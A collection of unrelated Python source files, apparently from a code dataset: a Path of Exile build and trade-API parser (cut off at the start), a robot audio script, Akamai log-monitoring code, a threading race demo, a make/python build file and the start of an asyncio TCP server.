lightning_mx = int(ensure_rangeless(item.lightning_max))
lightning_m += lightning_m * (stats['light inc'] / 100)
lightning_mx += lightning_mx * (stats['light inc'] / 100)
item.lightning_min = str(round(lightning_m))
item.lightning_max = str(round(lightning_mx))
if stats['chaos max'] or stats['chaos inc']:
if stats['chaos max']:
item.chaos_min = stats['chaos low']
item.chaos_max = stats['chaos max']
chaos_m = int(ensure_rangeless(item.chaos_min))
chaos_mx = int(ensure_rangeless(item.chaos_max))
chaos_m += chaos_m * (stats['chaos inc'] / 100)
chaos_mx += chaos_mx * (stats['chaos inc'] / 100)
item.chaos_min = str(round(chaos_m))
item.chaos_max = str(round(chaos_mx))
if stats['phys max'] or stats['phys inc']:
physical_m = int(ensure_rangeless(item.physical_min)) + stats['phys low']
physical_mx = int(ensure_rangeless(item.physical_max)) + stats['phys max']
physical_m += physical_m * (stats['phys inc'] / 100)
physical_mx += physical_mx * (stats['phys inc'] / 100)
item.physical_min = str(round(physical_m))
item.physical_max = str(round(physical_mx))
else:
try:
if item.armour:
arm = int(ensure_rangeless(item.armour))
arm += stats['flat armour']
arm += (stats['inc armour'] / 100) * arm
item.armour = str(round(arm))
except Exception:
return
if item.evasion:
ev = int(ensure_rangeless(item.evasion))
ev += stats['flat evasion']
ev += (stats['inc evasion'] / 100) * ev
item.evasion = str(round(ev))
if item.energy_shield:
es = int(ensure_rangeless(item.energy_shield))
es += stats['flat es']
es += (stats['inc es'] / 100) * es
item.energy_shield = str(round(es))
if "shield" in item.tags:
block = int(ensure_rangeless(item.block))
block += stats['block']
item.block = str(round(block))
def _get_wiki_base(item, object_dict, cl, slot, char_api=False, thread_exc_queue=None):
try:
assert item['rarity'].lower()
except Exception:
pass
if item['rarity'].lower() in ['unique', 'relic'] and char_api:
try:
wiki_base = cl.find_items({'name': item['name']})[0]
except IndexError:
ex = AbsentItemBaseException(f"Could not find {item['name']}")
if thread_exc_queue:
thread_exc_queue.put(ex)
return
if not wiki_base:
pass
if isinstance(wiki_base, Weapon):
wiki_base.attack_speed = item.get('attack_speed', 0)
wiki_base.chaos_min = item.get('chaos_min', 0)
wiki_base.chaos_max = item.get('chaos_max', 0)
wiki_base.cold_min = item.get('cold_min', 0)
wiki_base.cold_max = item.get('cold_max', 0)
wiki_base.fire_min = item.get('fire_min', 0)
wiki_base.fire_max = item.get('fire_max', 0)
wiki_base.lightning_min = item.get('lightning_min', 0)
wiki_base.lightning_max = item.get('lightning_max', 0)
wiki_base.physical_min = item.get('physical_min', 0)
wiki_base.physical_max = item.get('physical_max', 0)
wiki_base.range = item.get('range', 0)
wiki_base.critical_chance = item.get('critical_chance', 0)
elif isinstance(wiki_base, Armour):
wiki_base.armour = item.get('armour', 0)
wiki_base.evasion = item.get('evasion', 0)
wiki_base.energy_shield = item.get('energy_shield', 0)
if item['rarity'].lower() == 'relic':
wiki_base.rarity = 'relic'
elif item['rarity'].lower() in ['unique', 'relic']:
real_base = cl.find_items({'name': item['base']})[0]
try:
wiki_base = cl.find_items({'name': item['name']})[0]
except IndexError:
wiki_base = real_base
wiki_base.implicits = item['implicits']
wiki_base.explicits = item['stats']
wiki_base.name = item['name']
wiki_base.base = item['base']
wiki_base.rarity = item['rarity']
if isinstance(wiki_base, Weapon):
wiki_base.attack_speed = real_base.attack_speed
wiki_base.chaos_min = real_base.chaos_min
wiki_base.chaos_max = real_base.chaos_max
wiki_base.cold_min = real_base.cold_min
wiki_base.cold_max = real_base.cold_max
wiki_base.fire_min = real_base.fire_min
wiki_base.fire_max = real_base.fire_max
wiki_base.lightning_min = real_base.lightning_min
wiki_base.lightning_max = real_base.lightning_max
if real_base.physical_min > wiki_base.physical_min:
wiki_base.physical_min = real_base.physical_min
if real_base.physical_max > wiki_base.physical_max:
wiki_base.physical_max = real_base.physical_max
wiki_base.range = real_base.range
wiki_base.critical_chance = real_base.critical_chance
elif isinstance(wiki_base, Armour):
wiki_base.armour = real_base.armour
wiki_base.evasion = real_base.evasion
wiki_base.energy_shield = real_base.energy_shield
if item['rarity'].lower() == 'relic':
wiki_base.rarity = 'relic'
elif "Flask" in item['base']:
return
else:
if item['rarity'].lower() == 'magic' and item['name'] == item['base']:
if '' in item['stats']:
item['stats'].remove('')
item['base'] = get_base_from_magic(item['base'])
wl = []
for w in item['base'].split(' '):
if not any(char.isdigit() for char in w):
wl.append(w)
try:
wiki_base = cl.find_items({'name': ' '.join(wl).replace("Synthesised", "").strip()})[0]
except IndexError:
ex = AbsentItemBaseException(f"Could not find {item['name']}")
if thread_exc_queue:
thread_exc_queue.put(ex)
return
wiki_base.rarity = item['rarity']
wiki_base.name = item['name']
wiki_base.base = item['base']
if char_api:
if item['implicits']:
wiki_base.implicits = '<br>'.join(item['implicits'])
if item['explicits']:
wiki_base.explicits = '<br>'.join(item['explicits'])
else:
try:
pass
except Exception:
pass
if item['implicits']:
wiki_base.implicits = '<br>'.join(item['implicits'])
if item['stats']:
wiki_base.explicits = '<br>'.join(item['stats'])
if item['enchant']:
wiki_base.enchant = item['enchant']
wiki_base.quality = item['quality']
if wiki_base.rarity.lower() not in ['unique', 'relic'] and char_api or char_api is False:
if wiki_base.quality == '' or "ring" in wiki_base.tags or "amulet" in wiki_base.tags \
or "belt" in wiki_base.tags or "quiver" in wiki_base.tags or "flask" in wiki_base.tags \
or "jewel" in wiki_base.tags:
pass
else:
modify_base_stats(wiki_base)
if item['special']:
for influence in item['special']:
if influence == "Shaper Item":
wiki_base.influences.append("shaper")
elif influence == "Elder Item":
wiki_base.influences.append("elder")
elif influence == "Redeemer Item":
wiki_base.influences.append("redeemer")
elif influence == "Crusader Item":
wiki_base.influences.append("crusader")
elif influence == "Warlord Item":
wiki_base.influences.append("warlord")
elif influence == "Hunter Item":
wiki_base.influences.append("hunter")
object_dict[slot] = wiki_base
def parse_pob_xml(xml: str, cl=None):
tree = Etree.ElementTree(Etree.fromstring(xml))
equipped = {}
slots = tree.findall('Items/Slot')
for slot in slots:
if 'socket' in slot.attrib['name'].lower():
continue
equipped[slot.attrib['name']] = {}
equipped[slot.attrib['name']]['id'] = slot.attrib['itemId']
if cl:
obj_dict = {}
threads = []
exc_queue = Queue()
for slot in equipped:
item_id = equipped[slot]['id']
tree_item = tree.find(f'Items/Item[@id="{item_id}"]')
if 'variant' in tree_item.attrib:
lines = tree_item.text.replace('\t', '').split('\n')
for line in lines[:]:
if line.startswith('{variant'):
variant = line.split('variant:')[1][0]
if variant != tree_item.attrib['variant']:
lines.remove(line)
tree_item.text = '\n'.join(lines)
equipped[slot]['raw'] = tree_item.text.replace('\t', '')
try:
equipped[slot]['parsed'] = parse_pob_item(equipped[slot]['raw'])
except Exception:
continue
item = equipped[slot]['parsed']
t = threading.Thread(target=_get_wiki_base, args=(item, obj_dict, cl, slot))
threads.append(t)
t.start()
for thread in threads:
thread.join()
if not exc_queue.empty():
raise exc_queue.get()
for slot in obj_dict:
equipped[slot]['object'] = obj_dict[slot]
skill_slots = tree.findall('Skills/Skill')
for skill in skill_slots:
if 'slot' in skill.attrib:
slot = skill.attrib['slot']
if slot in equipped:
equipped[slot]['gems'] = []
lst = equipped[slot]['gems']
else:
continue
else:
if 'gem_groups' not in equipped:
equipped['gem_groups'] = {}
try:
if not skill.getchildren()[0].attrib['nameSpec'] in equipped['gem_groups']:
equipped['gem_groups'][skill.getchildren()[0].attrib['nameSpec']] = []
except Exception:
continue
lst = equipped['gem_groups'][skill.getchildren()[0].attrib['nameSpec']]
gems = skill.getchildren()
for gem in gems:
gem_d = {
'name': gem.attrib['nameSpec'],
'level': gem.attrib['level'],
'enabled': gem.attrib['enabled'],
'quality': gem.attrib['quality']
}
lst.append(gem_d)
stats = {}
active_spec = int(tree.find('Tree').attrib['activeSpec']) - 1
current_tree = tree.findall('Tree/Spec')[active_spec]
tree_base64 = current_tree.find('URL').text.replace('\t', '').replace('\n', '').rsplit('/', 1)[1]
byte_tree = binascii.a2b_base64(tree_base64.replace('-', '+').replace('_', '/'))
pos = 7
total_nodes = (len(byte_tree) - 7) // 2
nodes = []
for _ in range(total_nodes):
nodes.append(str(int.from_bytes(byte_tree[pos:pos + 2], byteorder='big')))
pos += 2
stats['keystones'] = []
stats['asc_nodes'] = []
for node in nodes:
if node in keystones:
stats['keystones'].append(keystones[node])
if node in asc_nodes:
stats['asc_nodes'].append(asc_nodes[node])
stats['trees'] = {}
for spec in tree.findall('Tree/Spec'):
name = spec.attrib['title'] if 'title' in spec.attrib else 'Default'
stats['trees'][name] = spec.find('URL').text.replace('\t', '').replace('\n', '').replace('/passive', '/fullscreen-passive')
stats['jewels'] = []
jewel_sockets = current_tree.findall('Sockets/Socket')
for socket in jewel_sockets:
if socket.attrib['itemId'] != "0":
item_id = socket.attrib['itemId']
parsed = parse_pob_item(tree.find(f'Items/Item[@id="{item_id}"]').text.replace('\t', ''))
stats['jewels'].append(parsed)
stats['equipped'] = equipped
try:
stats['bandit'] = tree.find('Build').attrib['bandit']
except Exception:
stats['bandit'] = "None"
try:
stats['class'] = tree.find('Build').attrib.get('className', "None")
stats['ascendancy'] = tree.find('Build').attrib.get('ascendClassName', "None")
try:
stats['total_dps'] = tree.find('Build/PlayerStat[@stat="CombinedDPS"]').attrib['value']
except Exception:
stats['total_dps'] = tree.find('Build/PlayerStat[@stat="TotalDPS"]').attrib['value']
stats['level'] = tree.find('Build').attrib['level']
try:
main_group = int(tree.find('Build').attrib.get('mainSocketGroup', 1))
skill_in_group = int(skill_slots[main_group - 1].attrib.get('mainActiveSkill', 1))
stats['main_skill'] = skill_slots[main_group - 1].getchildren()[skill_in_group - 1].attrib['nameSpec']
except Exception:
stats['main_skill'] = " "
stats['crit_chance'] = tree.find('Build/PlayerStat[@stat="PreEffectiveCritChance"]').attrib['value']
stats['effective_crit_chance'] = tree.find('Build/PlayerStat[@stat="CritChance"]').attrib['value']
stats['chance_to_hit'] = tree.find('Build/PlayerStat[@stat="HitChance"]').attrib['value']
stats['str'] = tree.find('Build/PlayerStat[@stat="Str"]').attrib['value']
stats['dex'] = tree.find('Build/PlayerStat[@stat="Dex"]').attrib['value']
stats['int'] = tree.find('Build/PlayerStat[@stat="Int"]').attrib['value']
stats['life'] = tree.find('Build/PlayerStat[@stat="Life"]').attrib['value']
stats['life_regen'] = tree.find('Build/PlayerStat[@stat="LifeRegen"]').attrib['value']
stats['es'] = tree.find('Build/PlayerStat[@stat="EnergyShield"]').attrib['value']
stats['es_regen'] = tree.find('Build/PlayerStat[@stat="EnergyShieldRegen"]').attrib['value']
try:
stats['degen'] = tree.find('Build/PlayerStat[@stat="TotalDegen"]').attrib['value']
except AttributeError:
stats['degen'] = "0"
stats['evasion'] = tree.find('Build/PlayerStat[@stat="Evasion"]').attrib['value']
stats['block'] = tree.find('Build/PlayerStat[@stat="BlockChance"]').attrib['value']
stats['spell_block'] = tree.find('Build/PlayerStat[@stat="SpellBlockChance"]').attrib['value']
stats['dodge'] = tree.find('Build/PlayerStat[@stat="AttackDodgeChance"]').attrib['value']
stats['spell_dodge'] = tree.find('Build/PlayerStat[@stat="SpellDodgeChance"]').attrib['value']
stats['fire_res'] = tree.find('Build/PlayerStat[@stat="FireResist"]').attrib['value']
stats['cold_res'] = tree.find('Build/PlayerStat[@stat="ColdResist"]').attrib['value']
stats['light_res'] = tree.find('Build/PlayerStat[@stat="LightningResist"]').attrib['value']
stats['chaos_res'] = tree.find('Build/PlayerStat[@stat="ChaosResist"]').attrib['value']
try:
stats['power_charges'] = tree.find('Build/PlayerStat[@stat="PowerChargesMax"]').attrib['value']
except Exception:
stats['power_charges'] = '3'
try:
stats['frenzy_charges'] = tree.find('Build/PlayerStat[@stat="FrenzyChargesMax"]').attrib['value']
except Exception:
stats['frenzy_charges'] = '3'
try:
stats['endurance_charges'] = tree.find('Build/PlayerStat[@stat="EnduranceChargesMax"]').attrib['value']
except Exception:
stats['endurance_charges'] = '3'
except AttributeError:
raise OutdatedPoBException()
return stats
def parse_poe_char_api(json, cl, items_only=False):
rarity = {
0: "Normal",
1: "Magic",
2: "Rare",
3: "Unique",
4: "Gem"
}
equipped = {}
threads = []
obj_dict = {}
for item in json['items']:
# TODO: Find a more idiomatic way to do this
# As it is now, this dict should only ever contain values of type `int`
char_item = defaultdict(int)
if items_only and 'Prophecy' in item['icon'] or 'Divination' in item['icon']:
equipped['Item'] = item
continue
char_item['rarity'] = rarity[item['frameType']]
char_item['name'] = item["name"].split('>>')[-1]
if 'properties' in item:
for prop in item['properties']:
if prop['name'] == "Quality":
char_item['quality'] = int(prop['values'][0][0][1:-1])
# Weapon stats
if prop['name'] == "Physical Damage":
char_item['physical_min'] = prop['values'][0][0].split('-')[0]
char_item['physical_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Fire Damage":
char_item['fire_min'] = prop['values'][0][0].split('-')[0]
char_item['fire_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Cold Damage":
char_item['cold_min'] = prop['values'][0][0].split('-')[0]
char_item['cold_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Lightning Damage":
char_item['lightning_min'] = prop['values'][0][0].split('-')[0]
char_item['lightning_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Chaos Damage":
char_item['chaos_min'] = prop['values'][0][0].split('-')[0]
char_item['chaos_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Critical Strike Chance":
char_item['critical_chance'] = prop['values'][0][0]
if prop['name'] == "Attacks per Second":
char_item['attack_speed'] = prop['values'][0][0]
if prop['name'] == "Weapon Range":
char_item['range'] = prop['values'][0][0]
# Armour Stats
if prop['name'] == "Armour":
char_item['armour'] = prop['values'][0][0]
if prop['name'] == "Energy Shield":
char_item['energy_shield'] = prop['values'][0][0]
if prop['name'] == "Evasion":
char_item['evasion'] = prop['values'][0][0]
if char_item['name'] == '':
char_item['name'] = item["typeLine"]
if char_item['rarity'] == "Magic":
char_item['base'] = get_base_from_magic(item['typeLine'])
else:
char_item['base'] = item["typeLine"]
if items_only:
slot = "Item"
elif 'Ring' in item['inventoryId']:
slot = "Ring 2" if "2" in item['inventoryId'] else "Ring 1"
elif item['inventoryId'] == "Offhand":
slot = "Weapon 2"
elif item['inventoryId'] == "Weapon":
slot = "Weapon 1"
elif item['inventoryId'] == "Helm":
slot = "Helmet"
elif item['inventoryId'] == "BodyArmour":
slot = "Body Armour"
elif item['inventoryId'] == "Flask":
slot = f"Flask {int(item['x']) + 1}"
char_item['name'] = item["typeLine"].split('>>')[-1]
if item['frameType'] == 1 and 'Flask of' in char_item['name']:
char_item['rarity'] = "Magic"
elif item['inventoryId'] in ['Amulet', 'Helm', 'Gloves', 'Belt', 'Flask', 'Boots', 'Weapon', 'PassiveJewels']:
slot = item['inventoryId']
else:
continue
if 'implicitMods' in item:
char_item['implicits'] = item['implicitMods']
else:
char_item['implicits'] = []
if 'explicitMods' in item:
char_item['explicits'] = item['explicitMods']
else:
char_item['explicits'] = []
if 'craftedMods' in item:
for mod in item['craftedMods']:
# FIXME: unresolved attribute
char_item['explicits'].append("{crafted}"f"{mod}")
if 'corrupted' in item:
# FIXME: unresolved attribute
char_item['explicits'].append('Corrupted')
if 'enchantMods' in item:
char_item['implicits'] = ["{crafted}" + item['enchantMods'][0]]
equipped[slot] = {}
if slot == 'PassiveJewels' or items_only:
if type(equipped[slot]) is dict:
equipped[slot] = []
equipped[slot].append(char_item)
else:
equipped[slot] = char_item
if 'socketedItems' in item and not items_only:
equipped[slot]['gems'] = []
for socketed in item['socketedItems']:
if socketed['frameType'] == 4:
gem_d = {'name': socketed['typeLine']}
for prop in socketed['properties']:
if prop['name'] == 'Quality':
gem_d['quality'] = prop['values'][0][0].replace('+', '').replace('%', '')
if prop['name'] == 'Level':
gem_d['level'] = prop['values'][0][0]
if 'quality' not in gem_d:
gem_d['quality'] = 0
equipped[slot]['gems'].append(gem_d)
if slot != 'PassiveJewels' and 'Flask' not in slot:
t = threading.Thread(target=_get_wiki_base, args=(char_item, obj_dict, cl, slot, True))
threads.append(t)
t.start()
for thread in threads:
thread.join()
if items_only:
equipped["items_objects"] = []
for slot in obj_dict:
if not items_only:
equipped[slot]['object'] = obj_dict[slot]
else:
equipped["items_objects"] = obj_dict[slot]
stats = {'equipped': equipped}
if 'character' in json:
stats['level'] = json['character']['level']
stats['ascendancy'] = json['character']['ascendancyClass']
stats['class'] = json['character']['class']
stats['charname'] = json['character']['name']
stats['league'] = json['character']['league']
return stats
def get_base_from_magic(name: str):
return ' '.join(name.split("of")[0].split("'")[-1].split()[1:])
def poe_skill_tree(hashes, asc: str = "None", return_keystones=False, return_asc=False):
char = {
"marauder": 1,
"ranger": 2,
"witch": 3,
"duelist": 4,
"templar": 5,
"shadow": 6,
"scion": 7
}
ascendancy_bytes = {
"marauder": {
"none": 0,
"juggernaut": 1,
"berserker": 2,
"chieftain": 3
},
"ranger": {
"none": 0,
"raider": 1,
"deadeye": 2,
"pathfinder": 3
},
"witch": {
"none": 0,
"occultist": 1,
"elementalist": 2,
"necromancer": 3
},
"duelist": {
"none": 0,
"slayer": 1,
"gladiator": 2,
"champion": 3
},
"templar": {
"none": 0,
"inquisitor": 1,
"hierophant": 2,
"guardian": 3
},
"shadow": {
"none": 0,
"assassin": 1,
"trickster": 2,
"saboteur": 3
},
"scion": {
"none": 0,
"ascendant": 1
}
}
# This took me a real assload of time to figure out
# Either the 4th only or the first 4 bytes represent tree/b64 format version on poe side
# 5th and 6th byte are character class and ascendancy respectively
# Not sure if 7th byte should inherently be 0, but I think its related to start/exit nodes
ba = bytearray([0, 0, 0, 4])
char_class = None
asc = asc.lower()
for a_char in ascendancy_bytes:
if asc in ascendancy_bytes[a_char]:
char_class = a_char
break
if not char_class:
char_class = asc
asc = "none"
ba += bytes([char[char_class]])
ba += bytes([ascendancy_bytes[char_class][asc.lower()]])
ba += bytes([0])
for hash_obj in hashes:
ba += hash_obj.to_bytes(2, 'big')
post = binascii.b2a_base64(ba).decode().replace('+', '-').replace('/', '_')
tree_keystones = []
ascendancy = []
for hash_obj in hashes:
if str(hash_obj) in keystones:
tree_keystones.append(keystones[str(hash_obj)])
if str(hash_obj) in asc_nodes:
ascendancy.append(asc_nodes[str(hash_obj)])
if return_keystones and return_asc:
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}", tree_keystones, ascendancy
elif return_keystones and not return_asc:
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}", tree_keystones
elif return_asc:
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}", ascendancy
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}"
def get_active_leagues():
http = urllib3.PoolManager()
resp = http.request('GET', 'https://www.pathofexile.com/api/trade/data/leagues')
if resp.status != 200:
raise RequestException(resp.data.decode('utf-8'))
leagues = js.loads(resp.data.decode('utf-8'))
return leagues['result']
def _trade_api_query(data, league, endpoint):
http = urllib3.PoolManager()
print(js.dumps(data).encode('utf-8'))
resp = http.request(
'POST', f'https://www.pathofexile.com/api/trade/{endpoint}/{league}',
body=js.dumps(data).encode('utf-8'), headers={'Content-Type': 'application/json'}
)
if resp.status != 200:
raise RequestException(resp.data.decode('utf-8'))
json_result = js.loads(resp.data.decode('utf-8'))
listing_ids = json_result['result']
entries = http.request('GET', f'https://www.pathofexile.com/api/trade/fetch/{",".join(listing_ids[:10])}')
if entries.status != 200:
raise RequestException(entries.data.decode('utf-8'))
return js.loads(entries.data.decode('utf-8'))['result']
def currency_rates(have: str, want: str, league: str):
data = {
"exchange": {
"status": {
"option": "online"
},
"have": [have],
"want": [want]
}
}
listings = _trade_api_query(data, league, 'exchange')
return CurrencyQuery(have, want, league, listings)
def item_price(item, league):
data = {
"query": {
"term": item,
"status": {
"option": "online"
}
},
"sort": {
"price": "asc"
},
}
listings = _trade_api_query(data, league, 'search')
return ItemPriceQuery(item, league, listings)
|
national-song.py | from expression import *
from threading import Thread
def song():
changeDegree([3,5,9], [70,60,90])
changeDegree([7], [30])
os.system('aplay /home/pi/Robot-Blueberry/audio-files/national-song.wav')
takePosition()
def move():
time.sleep(1)
if __name__ == '__main__':
t1 = Thread(target=song)
t2 = Thread(target=move)
t1.start()
t2.start()
|
UlsMonitoring.py | # Copyright 2022 Akamai Technologies, Inc. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import threading
import json
import datetime
import sys
import modules.aka_log as aka_log
import config.global_config as uls_config
class UlsMonitoring:
def __init__(self, stopEvent, product, feed, output):
"""
Hanlde ULS self monitoring, spills out performance counter on stdout.
Args:
stopEvent (threading.Event): Event from the controlling thread to tell the monitoring to stop
product (string): Akamai Product name/acronym
feed (string): specific data feed being consumed by ULS
"""
self._stopEvent = stopEvent
self._product = product
self._feed = feed
self._output = output
# Prevent other thread interact with the performance counters
self._metricLock = threading.Lock()
# Variables
self.monitoring_enabled = uls_config.monitoring_enabled # Monitoring enable Flag
self.monitoring_interval = uls_config.monitoring_interval # Monitoring interval
self._version = uls_config.__version__
# Definitions
self.name = "UlsMonitoring" # Class Human readable name
self.overall_messages_handled = 0 # Define overall number of messages handled
self.window_messages_handled = 0 # Define mon_window number of messages handled
self.init_time = time.time() # Define the init time
# Define the working thread, daemon allows us to offload
# of the main program termination to python
self.mon_thread = threading.Thread(target=self.display, daemon=True)
def start(self):
if self.monitoring_enabled:
aka_log.log.debug(f"{self.name} monitoring thread started...")
# Start the background thread
self.mon_thread.start()
else:
aka_log.log.debug(f"{self.name} monitoring was disabled - not starting.")
def display(self):
"""
Entry point for the monitoring thread
"""
try: # Exception handling is crucial once on the thread
while not self._stopEvent.is_set():
aka_log.log.debug(f"{self.name} sleeping {self.monitoring_interval} sec...")
# Wait return True unless the timer expired, which is when
# ULS is still active and we safely report the activity
if not self._stopEvent.wait(self.monitoring_interval):
mon_msg = {
'dt': datetime.datetime.utcnow().isoformat(),
'uls_product': self._product,
'uls_feed': self._feed,
'uls_output': self._output,
'uls_version': self._version,
'uls_runtime': self._runtime(),
'event_count': self.overall_messages_handled,
'event_count_interval': self.window_messages_handled,
'event_rate': round(self.window_messages_handled / self.monitoring_interval, 2),
'mon_interval': self.monitoring_interval
}
#print(json.dumps(mon_msg))
sys.stdout.write(json.dumps(mon_msg) + "\n")
sys.stdout.flush()
# Reset window based vars
with self._metricLock:
self.window_messages_handled = 0
except Exception as e:
aka_log.log.exception(e)
def increase_message_count(self):
with self._metricLock:
self.overall_messages_handled = self.overall_messages_handled + 1
self.window_messages_handled = self.window_messages_handled + 1
def get_message_count(self):
return self.overall_messages_handled
def get_stats(self):
with self._metricLock:
return f"event_count={self.overall_messages_handled}, runtime={self._runtime()}"
def _runtime(self):
return int(time.time() - self.init_time)
# EOF
|
4. non_locked_threads.py | from threading import Thread
import time
import random
counter = 0
def increment_counter():
global counter
time.sleep(random.randint(0, 2))
counter += 1
time.sleep(random.randint(0, 2))
print(f'New counter value: {counter}')
time.sleep(random.randint(0, 2))
print('-----------')
for x in range(10):
t = Thread(target=increment_counter)
time.sleep(random.randint(0, 2))
t.start()
|
cxx_sources_deps_rules.py | # this is a make/python hybrid file
# Normal make files are a make/sh hybrid.
# This makefile uses python instead of sh (or bash)
test_cxx_sources ?=
checkcxxsources $(cxxsources):$(out_init)
$(origin)
if (this == "checkcxxsources") and (not os.path.exists(env.cxxsources)):
leave()
caption()
if (this == env.cxxsources):
lib_cxx, main_cxx = [],[]
quote = "'"
else:
quote = ""
test_cxx=[]
for root, dirs, files in os.walk(env.cxxsrc) :
for file in files:
if file.endswith(".cxx"):
cxx = quote+os.path.join(root, file)+quote
if root.endswith("/main"):
if (this == env.cxxsources): lib_cxx.append(cxx); main_cxx.append(cxx)
test_cxx.append(cxx)
elif root.endswith("/test"):
test_cxx.append(cxx)
test_cxx.sort()
if (this == env.cxxsources):
lib_cxx.sort()
main_cxx.sort()
with open (this, "w") as f:
f.write("# === Generated by %s:%s ===\n\n" % (env.MAKEFILE_LIST, this))
f.write("lib_cxx_sources := %s\n\n" % (",".join(lib_cxx)))
f.write("main_cxx_sources := %s\n\n" % (",".join(main_cxx)))
f.write("test_cxx_sources := %s\n\n" % (",".join(test_cxx)))
leave()
before = set([$(test_cxx_sources)])
after = set(test_cxx)
removed = str(before-after).replace(root_prefix,"")
added = str(after-before).replace(root_prefix,"")
removals = removed != "set()"
additions = added != "set()"
if removals or additions:
print ("cxx source files were added or removed\n")
if removals: print("removals:", removed)
if additions: print("additions:", added)
print ("\nForcing dependency and rule regeneration and re-link.\n")
run(env.MAKE, "re-dep")
cxx_dep0 := $(CXX), "-E", "--trace-includes", $(DEP_CXX_FLAGS)
cxx_dep1 := "-I$(cxxinc)", cxx, "-o/dev/null"
cxx_dep := $(cxx_dep0), $(cxx_dep1)
$(cxxdeps): $(cxxsources);$(caption)
def find_dep(cxx, q, fd_a):
deps = []
lines = str(fd_a.gorge($(cxx_dep))).split(r"\n")
for line in lines:
i = line.find("$(cxxinc)")
if i != -1: deps.append(line[i:])
q.put(cxx[fd_a.root:].replace("/","_").replace(".cxx","_obj_deps"))
q.put([cxx] + sorted(deps))
queues, process = [],[]
fd_a=types.SimpleNamespace()
fd_a.gorge = gorge
fd_a.root = root_prefix_len
prefix = "test_cxx_sources := "
prefix_len = len(prefix)
with open(first) as f:
lines = f.readlines()
for line in lines:
if line.startswith(prefix):
sources = line[prefix_len:].rstrip()
test_cxx = sources.split(",")
for _cxx in test_cxx:
cxx = _cxx.replace("'","")
q = multiprocessing.Queue()
p = multiprocessing.Process(target=find_dep, args=(cxx, q, fd_a))
process.append(p)
queues.append(q)
p.start()
break
with open (this, "w") as f:
f.write("# === Generated by %s:%s ===\n\n" % (env.MAKEFILE_LIST, this))
n = 1
for q in queues:
obj = q.get()
deps = q.get()
f.write("\n# %d\n%s := " % (n, obj))
f.write(" ".join(deps))
f.write("\n")
n+=1
for p in process: p.join()
$(objrules): $(cxxdeps); $(caption)
suffix = "_obj_deps"
prefix = "cxxsrc_"
main_prefix = prefix + "main_"
test_prefix = prefix + "test_"
sep = " := "
sep_len = len(sep)
prefix_len = len(prefix)
main_obj0, test_obj0, lib_obj0 = [],[],[]
main_objs, test_objs, lib_objs = {},{},{}
cxx_ext = ".cxx"
cxx_ext_len = len(cxx_ext)
with open(first) as f:
lines = f.readlines()
for line in lines:
if line.startswith(prefix):
i = line.find(sep)
if i == -1: raise RuntimeError("Source deps line not formatted correctly")
deps = line[:i]
sources = line [i+sep_len:]
j = sources.find(cxx_ext)+cxx_ext_len
if j == -1: raise RuntimeError("Source deps line not formatted correctly")
cxxfile = sources[root_prefix_len:j]
cxxfile_i = "need to work on ctfe wrapper..."
deps1 = deps.replace(suffix,".o")
deps1 = deps1.replace("cxxsrc","$$(obj)")
deps1 = deps1.replace("_","/",2)
obj = deps1
if deps.startswith(main_prefix):
lib_obj = obj.replace("$$(obj)/main","$$(obj)/lib")
test_obj = obj.replace("$$(obj)/main/","$$(obj)/test/main__")
main_objs[obj] = (cxxfile,deps,cxxfile_i)
lib_objs[lib_obj] = (cxxfile,deps,cxxfile_i)
test_objs[test_obj] = (cxxfile,deps,cxxfile_i)
main_obj0.append(obj)
lib_obj0.append(lib_obj)
test_obj0.append(test_obj)
continue
if deps.startswith(test_prefix):
test_objs[obj] = (cxxfile,deps,cxxfile_i)
test_obj0.append(obj)
def target(label, objs, rule, cxx, dest, f):
f.write("\n\n# %s\n" % label)
for obj, pre in objs.items():
f.write("%s: $$(%s) %s\n $$(caption0);" % (obj, pre[1], dest))
f.write("""run(%s, '-D__CXX_SRCFILE__="%s"', %s)\n""" % (cxx, pre[0], rule))
f.write(" ## %s\n\n" % (pre[2]))
def make_quoted_list(obj): return ",".join(map(lambda x: "'"+x+"'", obj))
with open (this, "w") as f:
f.write("# === Generated by %s:%s ===\n\n" % (env.MAKEFILE_LIST, this))
f.write("\nmain_exe_objects := %s\n" % (" ".join(main_obj0)))
f.write("\nlib_so_objects := %s\n" % (" ".join(lib_obj0)))
f.write("\ntest_exe_objects := %s\n" % (" ".join(test_obj0)))
f.write("\n__main_exe_objects__ := %s\n" % (make_quoted_list(main_obj0)))
f.write("\n__lib_so_objects__ := %s\n" % (make_quoted_list(lib_obj0)))
f.write("\n__test_exe_objects__ := %s\n" % (make_quoted_list(test_obj0)))
ipch = "'-include-pch',"
rule = "$$(__CXX_FLAGS), '-c', '$$<', '-o$$@'"
main = ipch + "'$$(main_sysheaders_pch)'," + rule + ", $$(MAIN_EXTRA)"
test = ipch + "'$$(test_sysheaders_pch)'," + rule + ", $$(TEST_EXTRA)"
lib = ipch + "'$$(lib_sysheaders_pch)'," + rule + ", $$(LIB_EXTRA)"
cxx = "$$(CXX)"
main_d = "$$(obj_main_init) $$(main_sysheaders_pch)"
lib_d = "$$(obj_lib_init) $$(lib_sysheaders_pch)"
test_d = "$$(obj_test_init) $$(test_sysheaders_pch)"
target("main", main_objs, main, cxx, main_d, f)
target("lib", lib_objs, lib, cxx, lib_d, f)
target("test", test_objs, test, cxx, test_d, f)
|
tcp_server.py | # Copyright (c) 2017, 2018 Jae-jun Kang
# See the file LICENSE for details.
import asyncio
from threading import Thread
from x2py.util.trace import Trace
from x2py.links.server_link import ServerLink
from x2py.links.asyncio.tcp_session import TcpSession
class TcpServer(ServerLink):
def __init__(self, name):
super(TcpServer, self).__init__(name)
self.loop = asyncio.new_event_loop()
self.server = None
self.thread = Thread(target=self.loop.run_forever)
